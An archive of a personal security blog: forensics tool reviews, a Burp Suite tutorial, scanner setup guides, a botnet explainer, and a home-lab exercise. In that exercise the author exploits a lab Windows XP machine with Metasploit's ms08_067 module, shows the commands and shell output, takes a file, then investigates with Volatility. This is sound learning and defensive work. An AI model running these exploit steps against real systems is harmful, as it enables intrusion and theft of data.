Category Archives: Info Security

BlackLight Forensics Software

BlackBag BlackLight

I had no idea just how tightly BlackLight would grab onto my attention and then keep its hold. Yet, here I am. While I’ve heard positive feedback from people in the information security community regarding BlackBag’s forensic software products, I have not had the opportunity to use one of their products on my own. Thus, I was thrilled to review BlackBag’s BlackLight product.

For those who are not familiar, BlackBag’s BlackLight is a piece of comprehensive forensics analysis software that supports all major platforms, including Windows, Android, iPhone, iPad, and Mac. In addition to analysis, it can logically acquire Android and iPhone/iPad devices. You can also run the software on both Windows and Mac OS X.

In this particular review, I used the latest version of BlackLight (2016 release 3). I decided to use it on Mac. The main reason I chose Mac was that most of analysis that I have performed thus far has been with the traditional Windows Forensic Recovery of Evidence Device (FRED) and I figured this would be a great opportunity to try something different.

Installing BlackLight on Mac was a breeze. I simply downloaded the installation file from BlackBag’s website and entered the license key upon initial file execution. The single installation file took care of all of the dependencies needed for the software, which I was glad to see.

BlackLight Actionable Intel

BlackLight Actionable Intel

Here were the configurations for my Mac: MacBook Pro running Sierra OS version 10.12.2. The hardware included Intel Core i7 with 2.5 GHz with 16GB memory and a standard hard disk drive.

With review, I wanted to make a use-case in which I would perform basic processing and analysis of a traditional disk image using BlackLight running on Mac. Without any real experience with BlackLight, I focused on usability and intuitiveness.


For this review, used a 15GB physical image of Windows XP SP3 E01 Disk. I processed this image through BlackLight with all of the ingestion options available in the software and to my surprise, it took under 10 minutes to complete.

What was even more impressive was that it had very little performance impact on my system. In fact, as the image was being processed in the background, I continued to perform normal operations such as browsing the web and using Open Office software with no problem. Continue reading at by clicking here!

Tagged , ,

Advanced Forensic Toolkit (FTK) Course Review

For a few years, I had been using Access Data’s FTK (Forensic Toolkit) software without any formal training. I had managed to work my way through the fundamentals on my own, but I always sensed that there was much on which I was missing out.


FTK  Email Analysis Visualization

It was only after I recently attended the Advance FTK class offered by AccessData (Syntricate) that I realized the enormity of what had been right under my nose the whole time.

You can read my complete review of this course at Forensic Focus or by clicking here.

Tagged ,

Burp and Samurai-Web Testing Framework

The other day I came across a social media post that was about utilizing Burp Suite to identify vulnerabilities in web applications. I had heard of Burp before but never really had the chance to play around with it – until now.

Just like a lot of other security tools, Burp has a community version along with its commercial product. I decided to download the free edition from here in my home lab.  The installation process is straight forward and in no time you have Burp up and running. Here is how the initial interface looks like:


Right when I finished my installation of  Burp, I realized that I did not have a web application running in my lab that I could use to test Burp against. Bummer! Now I had to decide between setting up a web server myself or finding a commercial distribution that came pre-built with one. This was a no-brainer – and within minutes I found a few distributions that were designed for testing and learning web application security; such as: SamuraiWTF, WebGoat and Kali Web Application Metapackages. I decided to go with SamuraiWTF.

SamuraiWTF gives you the option to run from a live disk or install it in a VM. I decided to install the VM. Here is a good guide on the installation process. I give my VM instance 4GB RAM and 3 cores; more than enough horsepower.

This distribution comes pre-installed with Mutillidae, which is a “free, open source, deliberately vulnerable web-application providing a target for web-security enthusiasts”. This was perfect for what I was looking for. Setting up the Mutillidae in pretty simple – all I had to do was change my network configurations to NAT and that was it. However, if you need more information on configuration here are some great video guides on Mutillidae; in fact I used some of these myself while configuring Burp to work with Mutilliade.

After finishing all of the above prep work, I was ready to run Burp!

For those who are not familiar with Burp, its an interception proxy which sits between your browser and the web server and by doing so it is able to intercept requests/responses and provides you the ability to manipulate the content. To do so you have to configure Burp as your proxy. On your VM, this would be your local host (Proxy Tab > Options):


Likewise, you would have to configure your browser to that same proxy. Here is my proxy configuration on Firefox:

Firefox Proxy Configuration

Now as you navigate through your Mutilliadae webpage, all your requests should go through Burp. One thing you have to do is turn on the Intercept option in Burp. Its under Proxy > Intercept.

What this allows you to do is see the request as its made but gives you the control to either forward it to the web server or simply drop the request (like a typical MiTM). For example, on the login page of Mutilliade i used admin name and admin123 password. And as soon as I hit “Login” I saw the request being made from my browser to the webserver in Burp:

Burp Intercept

In the screenshot above, you can see the two options: Forward and Drop. If you hit forward, the web server will receive this request from your browser and will respond as it would normally. In this case, the account I used to login did not exist:

Web Server Respose

Burp has the capability to also capture the responses. It is an option that you can turn on by going to Proxy > Options and towards the middle of the page you will see “Intercept Server Responses”. By turning this on you will be able to see and control both sides of the requests:

Request and Response

If you look under Target > Site Map; on the left pane you will see list of all the sites that you have visited with the Burp proxy on:

History Map

One advantage of the above feature is that it allows you to go back and revisit requests and responses. The sites that are in grey color are those that are available on the target web page but you have not visited them.

Another neat feature is that if you do not want to visit each page individually you can run the “Spider” feature which will map the whole target page for you.


If you go under Spider > Control you are able to see the status of the Spider as it runs:

Spider Status

When you intercept request or response, you have the ability to send that to other features of Burp. You are able to view these additional options by right clicking on the intercept:

Intercept Additional Options

Towards the bottom of the official Burp Suite guide page here you can see a brief description of most of the options shown in the screenshot above. The one i found really neat is the “Repeater” option which allows you to modify and re-transmit requests repeatedly without having the need to perform new intercepts each time.

This concludes my brief journey of getting started with Burp using SamuraiWTF. There is whole lot more than I had the chance to explore but here is a great reference for advance topics.

Below  is a quick blurb on some of Burps features:

Spider: crawls the target and saves the numerous webpages that are on the target.

Intruder: automated attack feature which tries to automagically determine which parameters can be targeted i.e. fuzzing.

Fuzzing options: Sniper (fuzz each position one-by-one), Battering Ram (all positions on the target receive one payload), Pitchfork (each target position is fuzzed in parallel) Cluster Bomb (repeats through payloads for multiple positions at once).

Proxy: used to capture requests & responses to either just monitor or manipulate and replay.

Scope: controls what (pages, sites) is in/out of the test “scope”.

Repeater: manually resubmit requests/responses; allows modification.

Sequencer: used to detect predictability of session tokens using various built-in tests i.e. FIPS 140-2.

Decoder: allows encoding/decoding of the target data i.e. BASE64, Hex, Gzip, ASCII, etc.

Comparer: allows side-by-side analysis between two requests/responses.


Tagged , ,


How does it feel to know that your personal computer can be remotely controlled by someone without your knowledge for ill purposes? Or worse, instead of a single individual having this unauthorized access to your system it can be a group of people over the internet that control what your computer does and how it does it. In the field of Information Security, if your system is involved in such control it is considered a bot: a computer system being controlled by an automated malicious program. In addition, your computer system can be part of a larger group of infected computer systems and these collections of infected computers create botnets. Casually, these bots are also referred to as zombies and the remote controller is called the botmaster. So how are these bots born and grow into botnets?

According to Damballa, an independent security firm’s annual threat report, “at its peak in 2010, the total number of unique botnet victims grew by 654 percent, with an average incremental growth of 8 percent per week ”. Originally, these bots are developed by techsavvy criminals who develop the malicious bot code and then usually release in the open internet. While on the internet, the bot can perform numerous malicious functions based on its code design but it most cases it spreads itself across the internet by searching for vulnerable, unprotected computers to infect. After compromising victims’ computer, these bots quickly hide their presents in difficult to find locations, such as computer’s operating system files. The botmaster’s goal here is to maintain the compromised system behavior as normal as possible so the victim does not become suspicious. Common activities that bots perform at this stage involve registering themselves as trusted program in any anti-virus program that might be on victim’s computer. Moreover, to maintain persistence, bots add their operations in systems startup functions which results in bots automatically reactivating even after shutdown/restart. Throughout this process bots continue to report back to botmaster and wait for further instructions.

Below lists some of the common operations that bots can perform on behalf of its botmaster:

DoS (Denial of Service)
They send
– spam
– viruses
– spyware
They steal personal and private information and communicate it back to the malicious user:
– credit card numbers
– bank credentials
– other sensitive personal information
Launching denial of service (DoS) attacks against a specified target. Cybercriminals extort money from Web site owners, in exchange for regaining control of the compromised sites.
Fraudsters use bots to boost Web advertising billings by automatically clicking on Internet ad

As the chart above states, there are numerous functions that bots can perform. However, recently bots have mainly been used to conducted Distributed Denial of Service (DDoS) attacks: utilizing hundreds or thousands of bots from around the whole world against a single target.  Botmaster’s goal with DDoS is to use thousands of bots with numerous botnets to attempt to access the same resource simultaneously. This overwhelms the resource with thousands of requests per second thus making the resource unreachable. This inaccessibility of the resource has severe effects on legitimate users and requests. According to FBI, “botnet attacks have resulted in the overall loss of millions of dollars from financial institutions and other major U.S. businesses. They’ve also affected universities, hospitals, defense contractors, law enforcements, and all levels of government”.

A misconception exists that if your system does not hold any valuable information or if you do not use your system to conduct online financial transactions than an adversary is less likely to target your system. Unfortunately, as much as we would like this to be true, it is not the case. For botnets the most valuable element is your system’s storage and your internet speed. Our personal computers are now capable of storing and processing terabytes of information seamlessly and are able to use our high speed internet to transfer this information.  As stated by a malware researcher team from Dell SecureWorks, botnets “allows a single person or a group to leverage the power of lots of computers and lots of bandwidth that they wouldn’t be able to afford on their own”.


Tagged ,

Nexpose Scanner – Quick Setup

My last blog post was related to setting up Nessus home edition scanner for your lab to do testing. Nessus is properly what I am most familiar with and I like it. I also have some experience using Qualys scanner but it has been couple years since I have used it. However, the scanning technology that I have only heard of but never actually used is Nexpose. So for that reason I figured I give it a try.

Similar to other commercial scanning technologies, there is a community edition of Nexpose that you can download in your home lab for testing from here.

They have a pretty straight forward user/installation guide here, which I followed in my installation. But just in-case, here is the high level overview of how I did my setup.

  • Selected the VMWare Virtual Appliance option of the Community Edition
    • Completed the online forum and received the activation code in the email
    • The download contains 1.02GB of .ova file called NexposeVA.ova
  • I opened that file using VMWare Workstation
    • Please note that by default, it allocates 8GB of memory, 2 processors and 160GB of disk space. So, please modify these settings if you do not have those resources available before you power-on the VM.
  • After the VM completely boots, you will login using the following credentials: login: nexpose password: nexpose (please change this)
    • If you just want to complete the most basic setup and want to get up and running immediately without messing with any of the advance configurations or upgrades, the only configuration you need to do is networking. The virtual appliance is setup in bridge mode by default and should be able to get you an IP automatically. But if you need to give it static IP then you will have to do that manually.
  • At this point you are pretty much done with the setup. You will be able to complete the rest of the setup by accessing your Nexpose instance by typing following in your browser: https://%5BVM-IP-Address%5D:3780
    • The default username for the web interface is: nxadmin and the password is: nxpassword
    • After your first logon, the initlization process will take some time. For me, it was about 5-7 minutes.

Login Page

  • Like I said earlier, this was my first time using Nexpose so I did not know the exact steps to follow after logging in. But my goal was to run couple different scans against all of my lab machines (14 active IPs). So, without reading the user guide and only spending sometime familiarizing myself with the interface, following is the approach I took to setup my scans.
  • Create a “New Static Site
    • To me, this is similar to the Organization in Nessus (SecurityCenter)
    • Assets: here you provide the name of your site, list all of the IPs (assets) that are part of this site. I added my 14 IPs here.
    • Scan Setup: this is where you choose the type of scan. I personally did not like the scan setup option being part of the Site Configuration because each time you need to run a different type of a scan it seems like that you need to go and edit the site.
    • Credentials: In the next tab you can provide credentials. I like how it gives you the option to restrict each credentials to specific IP.
    • Web Application: next there is option for doing authenticated scans against a web application target. I did not explore this since I don’t have a test web application, yet.
    • Organization and Access: these two seem optional: Organization information and the ability to restrict access to this site to selected users.

Site Configuration

  • At this point you are ready to kick of your scan. Simply go back to your home page and find the “Scan Now” option towards the middle of the page. New window will come up and notice there you have the option to change Site; if you have multiple sites. But by default the site that you created in the previous step should be selected and you should see all of you assets (IPs) listed. And if you want to run the scan against all of those assets you kick it off by clicking “Start Now” but if you want to exclude some IPs or run it against only specific IP you can do that on this same screen.

Start New Scan

  • In the next screen you will be able to see the scan progress in real time.

Scan Progress

  • You will be able to see the scan results right after the scan completes. The scan results seen below are from a non-credentialed, exhausted scan against my lab machines.

Scan Results

  • The screenshot below shows the vulnerabilities tab of the web interface. You will notice the two columns that represent malware and exploit present; right before CVSS and Risk columns. This feature is different from Nessus but I like it. I think the commercial version of Nexpose allows you to take this to the next step and actually run an exploit.


  • The last feature that I wanted to explore was reporting. By default, there are several report templates that are available for you to select from:

All Report Templates

  • By simply selecting the template that you want from above you can choose the file format (PDF, XML, Excel), the scope (individual scan, assets like, from filters) and lastly the report frequency.
  • Here is the same report from my lab asset group:

Sample Report

This concludes the basic, quick deployment and walk-through of the commercial Nexpose. By using the virtual appliance option, the deployment is almost effort-less. And even after the deployment, setting up assets and kicking off basic scans from templates is straight forward. I will continue to use it on my lab machines and will share any new things that I discover that are worth sharing with new users!

Tagged , ,

Nessus Scanner – Quick Setup

Unfortunately, after my last CDR post  – for some unrelated reason, I had my main lab system crash and now I have to rebuild most of the different lab machines that I had before. Obviously this is little frustrating because I had everything setup the way I wanted it and now I have to pretty much start from scratch. But to make this rebuilding process little more pleasant and productive, I think I am going to document and share some of the labs that I am going to build. Most of these are going to be pretty simple to setup without much difficulty using VMware Workstation. I am not going to go over setting up VMware Workstation since there are already a ton of YouTube videos on it.

First we are going to select the platform that we are going to use for most of these machines – our choice: Ubuntu 13 Desktop.

The first tool that we are going to install is Nessus vulnerability scanner. In the first CDR project, we used Nessus as one of our reconnaissances tool along with Nmap. However, this tool can be used in just your lab or home network for identifying vulnerabilities in your systems.

We are going to be installing the latest version of Nessus v6 Home – as of this post. For the operating system, we will choose Ubuntu 11.10, 12.04, 12.10, 13.04, 13.10, and 14.04 AMD64 and download the .deb package.

Here are the sequence of commands after you have downloaded the package and opened the appropriate download directory in the terminal.

Nessus_installationWe are pretty much done. The only thing you need to check is if the Nessus service is running. Usually, it starts automatically but you can verify by running: service nessusd status. If the output shows stopped then simply run the following to start it: service nessusd start.

After above, open your browser and type your ip and port 8834. You can find your ip address by running ifconfig in your terminal. My ip address on this machine is:



You should get a similar page as above. Follow through the prompt and in couple screens you will have the option to create an initial account for your Nessus scanner. After that you will need to provide Plugin Feed Registration. For home use you can request the activation code by completing the following:

After completing all the steps thus far – you are done with installing your Nessus scanner. Now you need to configure you scans. Following are the basic steps to configure a scan:

New Scan > Basic Network Scan > [Complete the General Page with the Name of the Scan and the target IPs]. On the left side you have additional scan options that you can play around with. After you are done with making your selections, simply hit save and your scan will automatically start. The scan duration depends on the number of IPs that you are scanning and if they are credentialed or  non-credentialed.

After your scan completes you will be able to see the scan results and drill down on each host to see the details on the findings.  Later you can also run just reports against previously ran scan.

This is pretty much all you need to do for the basic setup. Feel free to run more scans and try to run credentialed scan as they will provide most comprehensive vulnerability information and its also least intrusive on your target systems.

Until next time!


Tagged , ,

Response – Case 001-02

Continuation of case 001-01


We already know that our Windows XP machine is compromised so we will proceed with collecting memory of the system. In addition, we will run some sysinternal tools to confirm the network communication to the malicious IP and determine the process which was involved in this communication.

To accomplish this task I used a batch script that I wrote sometime back which utilizes a number of sysinternal tools in conjunction with a raw memory dump tool. In result, we were not only able to collect the raw memory dump of the target machine but we also got access to volatile data that can be quickly analysed.

First we will take a look at the volatile (sysinternal) data:

From the response side, the only solid piece of information that we can use to pivot our analysis from is the connection between from our compromised machine (Windows XP @ to the malicious host (Metasploit @ And if you recall, we got this information from the numerous IDS alerts that we received during the Detection step. So based on this, the first volatile data that we will look at is the active connections on our compromised machine.

Active Connection

Active Connections

The active connections information above not only further confirms that our XP system is compromised but it also gives us our second pivot point – process ID 1128.

The next thing we find out is the process name associated with PID  1128; we pull the process list of our host:

Process List Tree

Process List Tree

According to above, the PID 1128 is another instance of SVCHOST.EXE and what is even more interesting is that this process is the parent process of two additional processes: PID 1808 WSCNTFY.EXE and PID 2024 WUAUCLT.EXE.

Pretty quickly we have been able to identify key information from just reviewing the output from our sysinternal tools. Now we’ll get into analyzing the memory dump of our system.

Volatility is what we will use to perform analysis of our system’s memory. First I want to see if there are any additional processes whose parent is PID 1128 SVCHOST.EXE. And in fact, by running the pstree plugin we see that a CMD.EXE process also points back to PID 1128. In addition, we see that our suspicious PID 1128 was spun off by PID 724 SERVICES.EXE.

Volatility Process Scan

Volatility Process Scan

The above pstree output is particularly interesting because when we initially reviewed the output of our sysinternal tools we only saw two sub-processes of PID 1128 but there was one more which was missed by our sysinternal tool. Similarly, we want to now use Volatility’s connscan plugin to identify all the connections to and from our malicious IP.

Volatility TCP Connections

Volatility TCP Connections

We now see that there were total of 6 network connections communicating with our malicious IP. But the good thing is that they were all associated with the same PID. So it seems like all the evil on our machine is related to PID 1128 and it’s sub-processes: PID 1808, PID 2024 and PID 1768. It would be safe to assume that code was injected into PID 1128 SVCHOST.EXT process by our bad guy and then executed the other two malicious processes; we can quickly confirm this:

Volatility Code Injection

Volatility Code Injection

Voaltiltiy’s malfind plugin confirms that PID 1128 contain header which looks to be for Microsoft Portable Executable files – thus confirms injected memory section.

Now we are going to look further into the two sub-processes by dumping out every memory section that belongs to them and perform reputation check. First, we’ll take hash of the processes and check in VirusTotal online database to see if any data on these processes already exists.


No existing data on this process. After uploading the executable – we received a low number of detection ratio; analysis results.


No existing data on this process. After uploading the executable – we also received a low number of detection ratio; analysis results.


No existing data on this process; did not upload the process for further analysis.

Based on the above results – it would be safe to say that a malicious software was not delivered on our machine. (which is true because if you go back and check the Compromise stage 1 & 2 – we did not deliver any malicious content on to our target).

So if a malicious software was not delivered – then what happened? To answer this we will use our systems disk image and create a system timeline. But before we do that – we will try to catch any “low hanging fruits”.

First thing we did was mount the target system’s image in read only mode and scan it using couple anti-virus software. In this case, our results came back clean. But if they had come back with any findings those could have been our next lead in the process.

The second thing that I would normally do is “malware footprinting” – this is when you have a piece of suspicious code and you want to see what it does when it is executed. From this you are able to collect your indicator of compromise (IOCs) and search the rest of your environment for those IOCs. Unfortunately, in this case – we have not found a malicious code and cannot do this process.

However, even though we did not identify any malicious program – we did review the persistence mechanism by looking at the results of our autoruns; output can be found here. The output does not indicate evidence of persistence.

Next up, prefetch. The prefetch analysis of our compromised system also did not provide any additional leads. The primary reason for this is because majority of the prefetch entries consisted of the sysinternal tools (without even meeting the 128 limit) that we ran during the acquisition setup – thus deemed useless. Copy of the prefetch report here.

Lastly, we look at system’s overall timeline. The timeline for the system also does not jump out with any significant amount of information in terms of how the compromise actually took place. With just using the intelligence that we collected from our memory analysis (src/dst IPs, processes); we did not find any further information that would help us put the picture together of what happened.

On the other hand, when we search for that Important.txt file that we created and then later copied out; there are quite a lot of entries about this file:

time type description
17:59:10 Created C:/Documents and Settings/Administrator/My Documents/Important.txt.txt
17:59:18 $SI […B] time /Documents and Settings/Administrator/Recent/Important.txt.lnk
18:00:17 Modified C:/Documents and Settings/Administrator/My Documents/Important.txt.txt
18:03:51 Access C:/Documents and Settings/Administrator/My Documents/Important.txt.txt
18:03:54 Last Visited/Last Visited visited file:///C:/Documents%20and%20Settings/Administrator/My%20Documents/Important.txt.txt
18:03:54 $SI [MAC.] time /Documents and Settings/Administrator/Recent/Important.txt.lnk
18:03:54 Last Access/Last Access visited file:///C:/Documents%20and%20Settings/Administrator/My%20Documents/Important.txt.txt
18:04:01 Modified C:/Documents and Settings/Administrator/My Documents/Important.txt
18:04:01 $SI […B] time /Documents and Settings/Administrator/My Documents/Important.txt
18:04:01 Created C:/Documents and Settings/Administrator/My Documents/Important.txt
18:04:06 File deleted DELETED C:/Documents and Settings/Administrator/My Documents/Important.txt.txt
18:06:19 Access C:/Documents and Settings/Administrator/My Documents/Important.txt
18:06:19 Last Visited/Last Visited visited file:///C:/Documents%20and%20Settings/Administrator/My%20Documents/Important.txt
18:06:19 File opened Recently opened file of extension: .txt – value: Important.txt
18:06:19 Last Access/Last Access visited file:///C:/Documents%20and%20Settings/Administrator/My%20Documents/Important.txt
18:06:47 $SI [M.C.] time /Documents and Settings/Administrator/My Documents/Important.txt
18:46:47 $SI [.A..] time /Documents and Settings/Administrator/My Documents/Important.txt

The above events clearly indicate the creation of our Important.txt file and the subsequent events show accessing of that file; however – not exactly sure why it shows the file getting deleted at 18:04:06 because we did not delete the file, instead we just copied it over.

So with above – we still have several questions unanswered however, by the end of our above analysis, we do know that our system was in fact communicating with the malicious hosts and several active/inactive connections were found to confirm this finding. In addition, we know that the compromise took place in a very short period of time – in which there does not seem to be any evidence of malicious code being installed, delivered or executed. Based on the system’s web and removable device analysis – we can confirm that the compromise did not take place from these areas. Lastly, we know that during the short timeframe of the compromise the Important.txt file was created (bec we did that during the compromise stage) and accessed numerous times. And while we do not have any further information to confirm that this file was accessed (or copied out)by the malicious source – it would be realizable to assume that whatever was contained in that txt file is potentially compromised.

Case Conclusion

There are couple things I would like to mention as we close out our first case. First, I would like to go over few disclaimers around how this case was setup.

The target XP host and our attacker machine was on the same network with no security measures in place (other then the passive IDS). The XP host had its firewall off and no anti-virus was installed. And this is one of the reasons why we do not have a lot evidence around what took place in this compromise from the response stage. I was able to extract the XP local event logs however, probably due to some corruption, was unable to open them for analysis.

Secondly, I believe if we had packet capture capability (or just netflow) setup during this lab, then we would have been able to confidently determine that Important.txt file was in fact copied out from our XP machine; I plan to have this capability down the road.

The third point that I want to add here is related to the sysinternal batch script that we used during the initial Response stage. Even though the script’s output provided us with useful information very early in the Response stage but as we got closer to system file and timeline analysis we noticed that alot of our results were polluted with our sysinternal tool executions. An overall lesson learned here.

Lastly, the goal of this exercise was to do a complete cycle of Compromise and Response without carrying over the knowledge between the stages. And for that reason, I did not look into how our selected Metasploit payloads operate and how they copy files over. Because unless our Response artifacts indicated the usage of those payloads (or even Metasploit) – it would have been cheating to use that information during Response.

With that said, I am sure that I overlooked artifacts during my analysis and which could have been the game-changers. And this is the whole point of these exercises, for me to do my best and then let others review what I have done and provide feedback on what I could do better. For this reason, I will be more than happy to share the case images to whoever that wants to take another stab at it. Just send me a message using the form on the contact page and I will share the link for the download. Thanks!

Tagged ,

Compromise, Detect, Respond – Project Kickoff – 001-01

I am sure that most of you have heard that in order for you to be good at any one specific security domain you need to have a solid understanding of the opposite domain as well. This is specially true between good and bad guys. You cannot be a great responder if you do not understand some of the basic techniques bad guys are using to break into your environment. Similarly, in order for you to successfully penetrate and maintain persistence in your target environment you need to understand how forensicators track your movements.

Like many of you, I have heard this concept during many presentations and conferences. And like many of you I have wondered how do I best accomplish this task myself. I, for one, aren’t an expect in any specific domain so in order for me to just catch up on the opposite domain – would actually require doing the both sides – good and bad. And so with this exact idea in mind, I am kicking off – which I am hoping is going to be a series of posts that will encompass the complete cycle: compromise -> detect -> respond (CDR).

Now, like I said in the beginning, I do not specialize in any particular domain but what I am hoping out of this project is that i will gain not only just a better but a holistic understanding of the core domains that make up infosec. So with this in mind, here is my setup.

I have setup three difference environments with the basic, free tools that will help me with each of the CDR stages:

Compromise – Metasploit, Armitage, Nessus, SET
Detect – EXE Radar Pro (trial), different A/Vs,  Snorby IDS (Thanks to dfinf2 for showing me the ropes on setting this up initially. I had to re-purpose this – but down the road i plan to expand IDS capability.)
Respond – SIFT, Redline, Splunk

In addition to the above tools repository – each environment has a diverse group of vulnerable machines that will be used as targets.

The last thing i want to cover before the official kick off is that during this whole process my goal will to be to go through all three of the CDR stages as quickly as possible with the least amount of effort. The idea behind this is that in real world there isn’t alot of time to get answers; typically you have a short period of time to get as much done as possible so that is what i plan on doing with these exercises. In addition, i will not be documenting each of the steps that i take. There are more than enough online guides that walk you through – for example how to use metasploit against a specific target so there isn’t a point for me to just duplicate that work. In fact, during these exercises I plan to use those same guides since i necessary don’t know how to use metasploit myself :)

With that i think i have covered all the overview topics that i wanted to cover. But as environments, tools and other things change i will mention them in the future posts. And now it’s time to kick off our first CDR – and whats a better way to kick off than using XP as your target!


case: 001-01

Target: WinXPProSP2 @

I started with basic nmap reconnaissances scan to see what i had open on the target machine.

Nmap scan report for
Host is up (0.00040s latency).
Not shown: 997 closed ports
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:91:68:A0
Device type: general purpose
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop

The nmap report above only shows three tcp ports open on our target system. But it does confirm the OS of the system and the network connectivity.  The next thing that i did was spend sometime searching online for XP metasploit exploits that i could use in this exercise. And in no-time i had few exploits that would give me remote access to the target system.

Here is the first one:

Name: Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Version: 0
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great

And now the payload – nothing like the VNC Inject for the first exercise!

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp
payload => windows/vncinject/bind_tcp
msf exploit(ms08_067_netapi) > set rhot
rhot =>
msf exploit(ms08_067_netapi) > check
msf exploit(ms08_067_netapi) > set RHOST
msf exploit(ms08_067_netapi) > check

[*] Verifying vulnerable status… (path: 0x0000005a)
[+] The target is vulnerable.
msf exploit(ms08_067_netapi) > exploit

And just like that we have Metasploit Shell (in blue) and we can remotely see the target system’s desktop (the black command prompt windows is on the target system)




At this point we have successfully been able to compromise the target system (using probably one of the oldest exploit for XP – but we are just getting started!). But before we move forward – with little more of compromise let’s check what, if anything we have from the detection point of view after our first attack.

Here is what we see in the IDS so far:


IDS VNC Detection

Now besides the fact that IDS triggered on our first exploit – i am even more happy to see that our IDS deployment is working overall!

Now lets look at some of the alert details. The first alert seems to be indicating that a Metasploit reverse shell with an executable code was detected. The other three alerts are related with a critical known buffer overflow vulnerability that exist in unpatched versions of MS.

Based on the above information – we have the basic information to initiate the response stage. We know the malicious source IP as well as the IP of the impacted host in our environment. But before we move forward with the response – lets just do a little bit more of compromise and see if we get successful in our second attempt or not.

Compromise 2

In the second Compromise stage, we are using the same exploit as the first Compromise (ms08_067_netapi), however our payload is now different.

msf exploit(ms08_067_netapi) > set payload windows/shell/bind_tcp

payload => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > set rhost
rhost =>
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to
[*] Command shell session 2 opened ( -> at 2014-06-22 17:49:04 -0400

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


As you will notice from above that our payload successfully delivered on the target system and in return give us access to target system’s shell. Now to make this scenario more interesting, I created a text file on the Windows XP target machine and named it Important.txt in My Documents under the Administrator account. Now my goal will be to read the content of that file from my metasploit system and possibly copy it out to my local hacking machine.

Accessing Important.txt File

Accessing Important.txt File

In the screenshot above we are able change directory from C:\WINDOWS\system32 and go to My Documents of the Administrator account and view the content of the Important.txt file.

So with above, our first goal is completed – we have been able to read the content of the Important.txt file. Now the second goal was to copy out the file on our local metasploit machine. For this we established another session with our target windows machine and instead of a windows shell, this time we got a meterpreter session after our payload.

Download Important.txt From Target To Local System

Download Important.txt From Target To Local System

After the successful payload delivery, we ran the getpid command to see which process on the target machine we’re binding with (this will be handy in the Response step). After that we changed directories to administrator user’s documents and downloaded the Important.txt successfully.

This concludes the Compromise 2 stage. At this time our target windows XP system is severely owned! – the IDS has triggered now total of 12 alerts related to this event:

Total IDS Alerts

Total IDS Alerts

Now we will move towards the Response phase.


We already know that our Windows XP machine is compromised so we will proceed with collecting the memory of the system. In addition, we will run some sysinternal tools to confirm the networking communication to the malicious IP and determine the process which was involved in this communication…


Support For Your Anti-Virus

Few months ago I published two blogs around having additional layers of security for your home computers. You can read them here: part 1 and part 2. The goal of those two blogs were to first bring awareness – using my personal experience around how we simply cannot rely on anti-virus software to protect our personal computers. And second to demonstrate how effective some free browser extensions are in reducing unwanted and potentially malicious programs from downloading in the background without much of our knowledge or interaction.

This blog is not exactly a continuation of the other two but it is definitely related. While in the previous posts I focused on free extensions, however in this post I want to talk about an application that is though not free but definitely worth looking into.

The EXE Radar Pro application from NoVirusThanks group (besides this particular software this group has bunch of free and extremely useful online utilities that I have been using for sometime and you should check those out too!). As far as the EXE Radar Pro goes – it is for $19.99 with the option to try free for 30 days. They do a pretty straight forward job explaining what the software does so I won’t waste time repeating what is already there. Instead I will briefly explain my experience with this software; both the pros and cons.

First the pros: the software is easy to install and seems to get to work immediately. There isn’t a lot of configuration or overly complicated interface that you need to worry about; it simply sits in your windows tray and all of the management is done by selecting the tray icon. Some of the more specific features that I like about this software is that I think this is the closest that you can get to an enterprise level endpoint monitoring software for such a low price. The software pretty much tracks all the running system processes, the associated parent process and monitors as new processes start. You also have to ability to tag  processes to either a blacklist or a whitelist based on what you think should be allowed or blocked. The software does prompt you when it thinks a suspicious/unknown process is trying to run. I believe some of the basic checks that it does to determine a good from a bad process it by simply checking if the process itself is digitally signed and if the process is making any specific/unusual command arguments. If fact it presents all this information on the prompt dialog:

EXE Radar Pro - Prompt Alert


From the dialog above you can simply choose to allow, block or use the drop down arrow to add the process to either the white/black list.  While the above dialog box is well designed and self explanatory – I also experienced some annoying cons with this dialog. For example, when you are prompted with the dialog box you do not have the option to ignore it. You can move it around the screen to get it out of the way but you have to make the decision to either allow/block. In addition, until you make your selection – you will not be able to execute another process. For example, when the above prompt came up on my screen and I wanted to take the screenshot using the Microsoft built-in snipping tool – I was not able to because the snipping application would not execute until I made my selection on the dialog box (I was able to do it using the keyboard print screen key).

Second major con that I experienced is that on each boot of the system there would a half-dozen prompts that I had to go through before the system would be fully up and functional. I understand that there is some learning that is involved in the beginning for the software but even after two weeks and several whitelistings I would still receive numerous prompt during startup. And as you can imagine, when you are trying to get something done quickly – these prompt becoming irritating. In fact, one of the applications that EXE Radar Pro did not like in particular was Splunk. Well before I downloaded EXE Radar Pro – I had the Splunk Free installed on the computer to do basic log analysis. But when I installed EXE Radar Pro – I would constantly get prompts. Eventually, I became irritated and ended up uninstalling Splunk from the system. In fact, even during the uninstall process of Splunk, I had to hit Allow at least 8 times before the uninstall process completed.

Overall, EXE Radar Pro is a good software for personal use because it provides that additional layer of protection and control around what runs in your system. I would say that while the interface is simple and self explanatory – an average user may not appreciate the frequency of the prompts, the technical  details and the decision making that would be required. On the other hand, if you like have such visibility and control of your system then for $19.99 you cannot go wrong with this software!




This is the second part of my layered security for home users topic. Please read the part 1 first to get the full background.

Recently my father purchased a new laptop for both personal and work use. And like many parents, he is decent when it comes to technology; he is able to perform many of the basic computer functions such as email, YouTube, Skype, social media and online searches. But when it comes to security, like many others he simply relies on the anti-virus software. I usually install the anti-virus software and configure schedule scans for him but this time he was away and had his computer setup from the store he purchased it from. The store tech support installed the Norton 360 Suite. Now, even though I have my preferences when it comes to different anti-virus software vendors but when it comes to layered security it does not matter.

